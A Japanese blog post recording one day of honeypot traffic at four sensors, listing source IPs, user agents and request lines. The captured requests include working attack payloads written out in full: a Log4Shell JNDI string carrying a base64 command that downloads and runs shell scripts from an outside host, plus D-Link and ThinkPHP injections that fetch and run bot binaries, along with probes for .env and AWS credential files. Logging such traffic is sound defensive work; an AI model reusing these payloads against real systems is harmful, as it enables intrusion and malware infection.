コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/12/13 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/12/13分です。

特徴
共通

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為

を確認しました。

Location:US

/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:UK

.jsへのスキャン行為

を確認しました。

Location:SG

curlによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為
Gh0stRATのような動き

を確認しました。

アクセス数推移

JP:総アクセス数:85 (前日比:4)
US:総アクセス数:212 (前日比:139)
UK:総アクセス数:99 (前日比:-154)
SG:総アクセス数:212 (前日比:-123)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.181.80.115 Bulgaria
1 20.197.7.252 United States
1 24.199.93.150 United States
20 35.84.141.163 United States
1 35.238.90.158 United States
1 43.154.173.181 Singapore
1 45.79.172.21 United States
1 45.79.181.94 United States
2 45.79.181.223 United States
1 45.79.181.251 United States
1 45.82.121.61 Germany
2 64.227.168.96 United States
2 84.21.172.128 Bulgaria
1 84.21.172.205 Bulgaria
5 95.214.235.205 Ukraine
1 101.32.209.199 Singapore
2 104.236.65.27 United States
1 109.151.65.80 United Kingdom
1 121.33.161.104 China
2 134.122.41.80 United States
14 135.125.244.48 France
1 146.190.116.143 United States
1 161.97.151.114 Germany
1 164.92.127.131 United States
1 167.94.138.44 United States
1 167.94.138.47 United States
1 172.104.11.4 United States
1 172.105.89.161 United States
1 172.105.128.11 United States
1 181.214.206.186 United States
4 183.136.225.32 China
6 185.254.196.115 Ukraine
1 192.155.90.118 United States
1 192.155.90.220 United States
1 192.241.208.201 United States
1 205.210.31.14 United States

UserAgent一覧

件数 UserAgent
21 -
1 Go-http-client/1.1
1 Hakai/2.0
18 Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 python-requests/2.27.1
1 python-requests/2.28.1
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//164[.]92[.]120[.]75:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGN1cmwgLU8gaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGNobW9kIDc3NyBodWguc2g7IHNoIGh1aC5zaDsgdGZ0cCAxOTEuMjM0LjIwMC4yMTYgLWMgZ2V0IGh1aC5zaDsgY2htb2QgNzc3IGh1aC5zaDsgc2ggaHVoLnNoOyB0ZnRwIC1yIGh1aDIuc2ggLWcgMTkxLjIzNC4yMDAuMjE2OyBjaG1vZCA3NzcgaHVoMi5zaDsgc2ggaHVoMi5zaDsgZnRwZ2V0IC12IC11IGFub255bW91cyAtcCBhbm9ueW1vdXMgLVAgMjEgMTkxLjIzNC4yMDAuMjE2IGh1aDEuc2ggaHVoMS5zaDsgc2ggaHVoMS5zaDsgcm0gLXJmIGh1aC5zaCBodWguc2ggaHVoMi5zaCBodWgxLnNoOyBybSAtcmYgKg==}')

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
17 \x16\x03\x01
1 CONNECT www[.]google[.]com:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
2 GET /.env.bak HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /:80:undefined?id= HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /apis/apps/v1/namespaces/kube-system/daemonsets/ HTTP/1.1
2 GET /aws.yml HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /config.js HTTP/1.1
2 GET /config/aws.yml HTTP/1.1
4 GET /favicon.ico HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /login.cgi?cli=aa%20aa%27;wget%20http[:]//46[.]19[.]141[.]122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%20cd%20/tmp;%20wget%20http[:]//5[.]181[.]80[.]115/razor/r4z0r.mips;%20chmod%20777%20*;%20./r4z0r.mips%20yarn;%20rm%20-rf%20* HTTP/1.1
2 GET /robots.txt HTTP/1.1
2 HEAD /Core/Skin/Login.aspx HTTP/1.1
2 HEAD / HTTP/1.1
1 POST /.env HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 13.38.15.89 United States
1 24.199.93.150 United States
7 36.156.28.130 China
1 43.154.173.181 Singapore
1 45.79.128.205 United States
1 45.79.181.104 United States
1 45.79.181.223 United States
27 54.37.79.75 France
1 54.37.163.160 France
1 60.217.75.70 China
1 64.62.197.94 United States
1 66.175.213.4 United States
1 84.21.172.128 Bulgaria
1 84.21.172.205 Bulgaria
2 92.255.85.173 Hong Kong
1 115.54.207.159 China
2 134.209.147.25 United States
1 146.190.62.201 United States
1 146.190.114.106 United States
1 152.89.196.211 Russia
1 159.65.62.192 United States
2 162.142.125.222 United States
2 167.94.145.57 United States
2 167.248.133.119 United States
127 171.244.27.200 Vietnam
1 172.104.11.34 United States
1 172.104.11.51 United States
1 172.105.128.11 United States
3 172.105.128.12 United States
2 172.105.128.13 United States
8 185.254.196.223 Ukraine
1 192.155.90.118 United States
1 194.49.94.234 Bulgaria
1 194.55.186.216 Bulgaria
2 195.133.20.253 Czechia
1 198.199.94.89 United States
1 198.235.24.22 United States
1 205.185.116.25 United States

UserAgent一覧

件数 UserAgent
34 -
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
127 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; CrOS x86_64 14526.89.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.133 Safari/537.36
38 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//164[.]92[.]120[.]75:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGN1cmwgLU8gaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGNobW9kIDc3NyBodWguc2g7IHNoIGh1aC5zaDsgdGZ0cCAxOTEuMjM0LjIwMC4yMTYgLWMgZ2V0IGh1aC5zaDsgY2htb2QgNzc3IGh1aC5zaDsgc2ggaHVoLnNoOyB0ZnRwIC1yIGh1aDIuc2ggLWcgMTkxLjIzNC4yMDAuMjE2OyBjaG1vZCA3NzcgaHVoMi5zaDsgc2ggaHVoMi5zaDsgZnRwZ2V0IC12IC11IGFub255bW91cyAtcCBhbm9ueW1vdXMgLVAgMjEgMTkxLjIzNC4yMDAuMjE2IGh1aDEuc2ggaHVoMS5zaDsgc2ggaHVoMS5zaDsgcm0gLXJmIGh1aC5zaCBodWguc2ggaHVoMi5zaCBodWgxLnNoOyBybSAtcmYgKg==}')

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
2 SSH-2.0-libssh2_1.10.0
2 \x03
25 \x16\x03\x01
36 GET /.env HTTP/1.1
3 GET /.git/config HTTP/1.1
1 GET /1phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /:80:undefined?id= HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /__phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/pma/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
3 GET /admin/web/index.php?lang=en HTTP/1.1
2 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /apis/apps/v1/namespaces/kube-system/daemonsets/ HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /database/index.php?lang=en HTTP/1.1
2 GET /db/db-admin/index.php?lang=en HTTP/1.1
5 GET /db/dbadmin/index.php?lang=en HTTP/1.1
3 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /db/webadmin/index.php?lang=en HTTP/1.1
2 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
3 GET /mysql-admin/index.php?lang=en HTTP/1.1
3 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
2 GET /mysql/index.php?lang=en HTTP/1.1
2 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
2 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4.9.10-all-languages/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.3.0-all-languages/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-latest-all-languages/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
2 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
2 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
3 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
3 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
3 GET /sqlmanager/index.php?lang=en HTTP/1.1
3 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
3 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 24.199.93.150 United States
7 36.156.28.130 China
7 36.156.28.131 China
2 45.79.128.205 United States
1 45.79.181.179 United States
1 45.79.181.223 United States
2 47.88.86.63 United States
24 54.37.79.75 France
1 60.217.75.70 China
1 64.62.197.116 United States
1 65.157.23.94 United States
1 66.175.213.4 United States
1 84.21.172.128 Bulgaria
1 84.21.172.205 Bulgaria
9 90.151.171.106 Russia
4 90.151.171.108 Russia
1 92.255.85.173 Hong Kong
1 146.190.62.40 United States
1 148.64.121.254 United States
1 152.89.196.211 Russia
2 162.142.125.213 United States
1 172.104.11.4 United States
1 172.104.11.46 United States
1 172.105.128.13 United States
6 183.136.225.32 China
8 185.254.196.223 Ukraine
4 192.155.90.220 United States
1 192.241.212.102 United States
1 194.55.186.216 Bulgaria
4 198.20.87.98 United States
1 198.235.24.10 United States
1 205.210.31.130 United States

UserAgent一覧

件数 UserAgent
36 -
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
13 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
34 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//164[.]92[.]120[.]75:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGN1cmwgLU8gaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGNobW9kIDc3NyBodWguc2g7IHNoIGh1aC5zaDsgdGZ0cCAxOTEuMjM0LjIwMC4yMTYgLWMgZ2V0IGh1aC5zaDsgY2htb2QgNzc3IGh1aC5zaDsgc2ggaHVoLnNoOyB0ZnRwIC1yIGh1aDIuc2ggLWcgMTkxLjIzNC4yMDAuMjE2OyBjaG1vZCA3NzcgaHVoMi5zaDsgc2ggaHVoMi5zaDsgZnRwZ2V0IC12IC11IGFub255bW91cyAtcCBhbm9ueW1vdXMgLVAgMjEgMTkxLjIzNC4yMDAuMjE2IGh1aDEuc2ggaHVoMS5zaDsgc2ggaHVoMS5zaDsgcm0gLXJmIGh1aC5zaCBodWguc2ggaHVoMi5zaCBodWgxLnNoOyBybSAtcmYgKg==}')

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
1 \x03
30 \x16\x03\x01
2 CONNECT check.best-proxies[.]ru:443 HTTP/1.1
1 CONNECT checkip[.]amazonaws[.]com:443 HTTP/1.1
2 CONNECT ip[.]bablosoft[.]com:443 HTTP/1.1
2 CONNECT v4[.]ident[.]me:443 HTTP/1.1
34 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /:80:undefined?id= HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
6 GET /favicon.ico HTTP/1.1
4 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET http[:]//check[.]best-proxies.ru/ip.php?Z72612114222Q1 HTTP/1.1
1 GET http[:]//checkip[.]amazonaws[.]com?Z72612114222Q1 HTTP/1.1
2 GET http[:]//ip[.]bablosoft[.]com/?Z72612114222Q1 HTTP/1.1
2 GET http[:]//v4[.]ident[.]me?Z72612114222Q1 HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.14.7.100 China
1 20.55.53.144 United States
1 24.199.93.150 United States
1 38.68.47.133 United States
1 45.79.181.104 United States
1 45.79.181.251 United States
21 51.79.29.48 Canada
1 65.49.20.67 United States
1 66.240.205.34 United States
1 84.21.172.128 Bulgaria
1 84.21.172.205 Bulgaria
2 92.255.85.173 Hong Kong
1 104.248.33.0 United States
1 109.206.243.139 Bulgaria
2 109.237.98.226 Russia
144 139.162.7.59 Netherlands
1 147.182.165.215 United States
1 152.89.196.211 Russia
2 162.142.125.219 United States
2 167.94.145.60 United States
2 167.248.133.119 United States
1 172.104.11.4 United States
2 172.104.11.34 United States
2 172.104.11.51 United States
2 172.105.128.11 United States
1 172.105.128.12 United States
2 172.105.128.13 United States
2 183.136.225.32 China
1 192.241.196.160 United States
2 194.55.186.216 Bulgaria
2 194.165.16.10 Panama
4 198.20.69.98 United States
1 198.235.24.2 United States
1 198.235.24.10 United States

UserAgent一覧

件数 UserAgent
30 -
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
23 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
143 curl/7.54.0
1 python-requests/2.28.1
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//164[.]92[.]120[.]75:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGN1cmwgLU8gaHR0cDovLzE5MS4yMzQuMjAwLjIxNi9odWguc2g7IGNobW9kIDc3NyBodWguc2g7IHNoIGh1aC5zaDsgdGZ0cCAxOTEuMjM0LjIwMC4yMTYgLWMgZ2V0IGh1aC5zaDsgY2htb2QgNzc3IGh1aC5zaDsgc2ggaHVoLnNoOyB0ZnRwIC1yIGh1aDIuc2ggLWcgMTkxLjIzNC4yMDAuMjE2OyBjaG1vZCA3NzcgaHVoMi5zaDsgc2ggaHVoMi5zaDsgZnRwZ2V0IC12IC11IGFub255bW91cyAtcCBhbm9ueW1vdXMgLVAgMjEgMTkxLjIzNC4yMDAuMjE2IGh1aDEuc2ggaHVoMS5zaDsgc2ggaHVoMS5zaDsgcm0gLXJmIGh1aC5zaCBodWguc2ggaHVoMi5zaCBodWgxLnNoOyBybSAtcmYgKg==}')

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 Gh0st\xad
1 MGLNDD_13.67.44.234_80
4 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x02
15 \x16\x03\x01
24 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /:80:undefined?id= HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /admin.asp HTTP/1.1
1 GET /admin.aspx HTTP/1.1
1 GET /admin.cfm HTTP/1.1
1 GET /admin.cgi HTTP/1.1
1 GET /admin.html HTTP/1.1
1 GET /admin.jhtml HTTP/1.1
1 GET /admin.jsa HTTP/1.1
1 GET /admin.jsp HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.pl HTTP/1.1
1 GET /admin.shtml HTTP/1.1
1 GET /base.asp HTTP/1.1
1 GET /base.aspx HTTP/1.1
1 GET /base.cfm HTTP/1.1
1 GET /base.cgi HTTP/1.1
1 GET /base.html HTTP/1.1
1 GET /base.inc HTTP/1.1
1 GET /base.jhtml HTTP/1.1
1 GET /base.jsa HTTP/1.1
1 GET /base.jsp HTTP/1.1
1 GET /base.php HTTP/1.1
1 GET /base.pl HTTP/1.1
1 GET /base.shtml HTTP/1.1
1 GET /default.asp HTTP/1.1
1 GET /default.aspx HTTP/1.1
1 GET /default.cfm HTTP/1.1
1 GET /default.cgi HTTP/1.1
1 GET /default.html HTTP/1.1
1 GET /default.jhtml HTTP/1.1
1 GET /default.jsa HTTP/1.1
1 GET /default.jsp HTTP/1.1
1 GET /default.php HTTP/1.1
1 GET /default.pl HTTP/1.1
1 GET /default.shtml HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
1 GET /eAHn HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /home.aspx HTTP/1.1
1 GET /home.cfm HTTP/1.1
1 GET /home.cgi HTTP/1.1
1 GET /home.html HTTP/1.1
1 GET /home.jhtml HTTP/1.1
1 GET /home.jsa HTTP/1.1
1 GET /home.jsp HTTP/1.1
1 GET /home.php HTTP/1.1
1 GET /home.pl HTTP/1.1
1 GET /home.shtml HTTP/1.1
1 GET /index.asp HTTP/1.1
1 GET /index.aspx HTTP/1.1
1 GET /index.cfm HTTP/1.1
1 GET /index.cgi HTTP/1.1
1 GET /index.html HTTP/1.1
1 GET /index.jhtml HTTP/1.1
1 GET /index.jsa HTTP/1.1
1 GET /index.jsp HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.pl HTTP/1.1
1 GET /index.shtml HTTP/1.1
1 GET /indice.asp HTTP/1.1
1 GET /indice.aspx HTTP/1.1
1 GET /indice.cfm HTTP/1.1
1 GET /indice.cgi HTTP/1.1
1 GET /indice.html HTTP/1.1
1 GET /indice.jhtml HTTP/1.1
1 GET /indice.jsa HTTP/1.1
1 GET /indice.jsp HTTP/1.1
1 GET /indice.php HTTP/1.1
1 GET /indice.pl HTTP/1.1
1 GET /indice.shtml HTTP/1.1
1 GET /inicio.asp HTTP/1.1
1 GET /inicio.aspx HTTP/1.1
1 GET /inicio.cfm HTTP/1.1
1 GET /inicio.cgi HTTP/1.1
1 GET /inicio.html HTTP/1.1
1 GET /inicio.jhtml HTTP/1.1
1 GET /inicio.jsa HTTP/1.1
1 GET /inicio.jsp HTTP/1.1
1 GET /inicio.php HTTP/1.1
1 GET /inicio.pl HTTP/1.1
1 GET /inicio.shtml HTTP/1.1
1 GET /localstart.asp HTTP/1.1
1 GET /localstart.aspx HTTP/1.1
1 GET /localstart.cfm HTTP/1.1
1 GET /localstart.cgi HTTP/1.1
1 GET /localstart.html HTTP/1.1
1 GET /localstart.jhtml HTTP/1.1
1 GET /localstart.jsa HTTP/1.1
1 GET /localstart.jsp HTTP/1.1
1 GET /localstart.php HTTP/1.1
1 GET /localstart.pl HTTP/1.1
1 GET /localstart.shtml HTTP/1.1
1 GET /main.asp HTTP/1.1
1 GET /main.aspx HTTP/1.1
1 GET /main.cfm HTTP/1.1
1 GET /main.cgi HTTP/1.1
1 GET /main.html HTTP/1.1
1 GET /main.jhtml HTTP/1.1
1 GET /main.jsa HTTP/1.1
1 GET /main.jsp HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /main.pl HTTP/1.1
1 GET /main.shtml HTTP/1.1
1 GET /menu.asp HTTP/1.1
1 GET /menu.aspx HTTP/1.1
1 GET /menu.cfm HTTP/1.1
1 GET /menu.cgi HTTP/1.1
1 GET /menu.html HTTP/1.1
1 GET /menu.jhtml HTTP/1.1
1 GET /menu.jsa HTTP/1.1
1 GET /menu.jsp HTTP/1.1
1 GET /menu.php HTTP/1.1
1 GET /menu.pl HTTP/1.1
1 GET /menu.shtml HTTP/1.1
1 GET /nmaplowercheck1670805823 HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /readme.txt HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /start.asp HTTP/1.1
1 GET /start.aspx HTTP/1.1
1 GET /start.cfm HTTP/1.1
